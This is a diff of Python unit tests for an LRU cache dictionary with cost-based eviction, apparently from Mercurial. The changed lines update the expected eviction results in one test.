278 278 d.insert('f', 'vf', cost=11)
279 279 self.assertEqual(len(d), 1)
280 280 self.assertEqual(d.totalcost, 11)
281 281 self.assertIn('f', d)
282 282
283 283 # Inserting a new element will evict the last item since it is
284 284 # too large.
285 285 d['g'] = 'vg'
286 286 self.assertEqual(len(d), 1)
287 287 self.assertEqual(d.totalcost, 0)
288 288 self.assertIn('g', d)
289 289
290 290 d.clear()
291 291
292 292 d.insert('a', 'va', cost=7)
293 293 d.insert('b', 'vb', cost=3)
294 294 self.assertEqual(len(d), 2)
295 295
296 296 # Replacing a value with smaller cost won't result in eviction.
297 297 d.insert('b', 'vb2', cost=2)
298 298 self.assertEqual(len(d), 2)
299 299
300 300 # Replacing a value with a higher cost will evict when threshold
301 301 # exceeded.
302 302 d.insert('b', 'vb3', cost=4)
303 303 self.assertEqual(len(d), 1)
304 304 self.assertNotIn('a', d)
305 305
306 306 def testmaxcostcomplex(self):
307 307 d = util.lrucachedict(100, maxcost=100)
308 308 d.insert('a', 'va', cost=9)
309 309 d.insert('b', 'vb', cost=21)
310 310 d.insert('c', 'vc', cost=7)
311 311 d.insert('d', 'vc', cost=50)
312 312 self.assertEqual(d.totalcost, 87)
313 313
314 314 # Inserting new element should free multiple elements so we hit
315 315 # low water mark.
316 316 d.insert('e', 'vd', cost=25)
317 self.assertEqual(len(d), 3)
317 self.assertEqual(len(d), 2)
318 318 self.assertNotIn('a', d)
319 319 self.assertNotIn('b', d)
320 self.assertIn('c', d)
320 self.assertNotIn('c', d)
321 321 self.assertIn('d', d)
322 322 self.assertIn('e', d)
323 323
324 324 if __name__ == '__main__':
325 325 silenttestrunner.main(__name__)